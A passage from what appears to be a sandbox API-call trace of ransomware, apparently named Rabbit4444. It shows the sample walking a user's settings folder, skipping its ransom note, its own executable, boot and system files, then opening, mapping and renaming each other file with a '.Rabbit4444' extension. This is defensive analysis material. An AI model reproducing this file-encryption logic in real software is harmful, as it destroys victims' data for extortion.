"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccesstogglekeys.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.347] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.347] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14765729970) returned 1 [0056.347] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1181) returned 1 [0056.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0056.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0056.347] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0056.348] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0056.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.349] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14766014037) returned 1 [0056.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0056.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0056.350] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.350] CloseHandle (hObject=0x298) returned 1 [0056.350] CloseHandle (hObject=0x278) returned 1 [0056.350] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms.Rabbit4444") returned 185 [0056.350] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccesstogglekeys.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupeaseofaccesstogglekeys.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.351] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1a470f8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1a470f8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupFamilyUsers.settingcontent-ms", cAlternateFileName="AAD94F~1.SET")) returned 1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2=".") returned 1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="..") returned 1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="windows") returned -1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="boot") returned -1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.351] lstrcmpiW (lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.351] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupFamilyUsers.settingcontent-ms" | out: lpString1="AAA_SettingsGroupFamilyUsers.settingcontent-ms") returned="AAA_SettingsGroupFamilyUsers.settingcontent-ms" [0056.351] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupFamilyUsers.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.351] lstrlenW (lpString="AAA_SettingsGroupFamilyUsers.settingcontent-ms") returned 46 [0056.351] lstrlenW (lpString="Rabbit4444") returned 10 [0056.351] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.351] lstrlenW (lpString=".dll") returned 4 [0056.351] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.351] lstrlenW (lpString=".lnk") returned 4 [0056.351] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.351] lstrlenW (lpString=".ini") returned 4 [0056.351] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.351] lstrlenW (lpString=".sys") returned 4 [0056.351] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupFamilyUsers.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupfamilyusers.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.352] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.352] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14766246806) returned 1 [0056.352] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1119) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.352] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.353] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.354] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14766498914) returned 1 [0056.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.354] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.354] CloseHandle (hObject=0x298) returned 1 [0056.355] CloseHandle (hObject=0x278) returned 1 [0056.355] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupFamilyUsers.settingcontent-ms.Rabbit4444") returned 174 [0056.355] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupFamilyUsers.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupfamilyusers.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupFamilyUsers.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupfamilyusers.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.356] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c8349b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1c8349b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x463, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupInputMouse.settingcontent-ms", cAlternateFileName="AAA063~1.SET")) returned 1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2=".") returned 1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="..") returned 1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="windows") returned -1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="boot") returned -1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.356] lstrcmpiW (lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.356] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupInputMouse.settingcontent-ms" | out: lpString1="AAA_SettingsGroupInputMouse.settingcontent-ms") returned="AAA_SettingsGroupInputMouse.settingcontent-ms" [0056.356] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupInputMouse.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.356] lstrlenW (lpString="AAA_SettingsGroupInputMouse.settingcontent-ms") returned 45 [0056.356] lstrlenW (lpString="Rabbit4444") returned 10 [0056.356] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.356] lstrlenW (lpString=".dll") returned 4 [0056.356] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.356] lstrlenW (lpString=".lnk") returned 4 [0056.356] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.356] lstrlenW (lpString=".ini") returned 4 [0056.356] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.356] lstrlenW (lpString=".sys") returned 4 [0056.356] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.357] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupInputMouse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupinputmouse.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.357] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.357] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14766752164) returned 1 [0056.357] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1123) returned 1 [0056.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.357] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0056.358] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0056.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.359] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14767006491) returned 1 [0056.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0056.359] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.360] CloseHandle (hObject=0x298) returned 1 [0056.360] CloseHandle (hObject=0x278) returned 1 [0056.360] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupInputMouse.settingcontent-ms.Rabbit4444") returned 173 [0056.360] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupInputMouse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupinputmouse.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupInputMouse.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupinputmouse.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.360] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ee5a1b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1ee5a1b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x487, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", cAlternateFileName="AAE326~1.SET")) returned 1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2=".") returned 1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="..") returned 1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="windows") returned -1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="boot") returned -1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.366] lstrcmpiW (lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.366] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupLockScreenPreview.settingcontent-ms" | out: lpString1="AAA_SettingsGroupLockScreenPreview.settingcontent-ms") returned="AAA_SettingsGroupLockScreenPreview.settingcontent-ms" [0056.366] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupLockScreenPreview.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.366] lstrlenW (lpString="AAA_SettingsGroupLockScreenPreview.settingcontent-ms") returned 52 [0056.366] lstrlenW (lpString="Rabbit4444") returned 10 [0056.366] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.367] lstrlenW (lpString=".dll") returned 4 [0056.367] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.367] lstrlenW (lpString=".lnk") returned 4 [0056.367] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.367] lstrlenW (lpString=".ini") returned 4 [0056.367] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.367] lstrlenW (lpString=".sys") returned 4 [0056.367] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.367] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupLockScreenPreview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouplockscreenpreview.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.367] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.367] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14767774024) returned 1 [0056.367] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1159) returned 1 [0056.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0056.367] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0056.367] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.371] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.372] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14768298341) returned 1 [0056.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0056.372] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0056.372] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.372] CloseHandle (hObject=0x298) returned 1 [0056.372] CloseHandle (hObject=0x278) returned 1 [0056.373] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupLockScreenPreview.settingcontent-ms.Rabbit4444") returned 180 [0056.373] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupLockScreenPreview.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouplockscreenpreview.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupLockScreenPreview.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouplockscreenpreview.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.373] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf22c56e1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf22c56e1, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x456, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupMapsUpdates.settingcontent-ms", cAlternateFileName="AA7296~1.SET")) returned 1 [0056.373] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.373] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.373] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.373] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2=".") returned 1 [0056.373] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="..") returned 1 [0056.374] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="windows") returned -1 [0056.374] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.374] lstrcmpiW (lpString1="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.374] lstrcmpiW 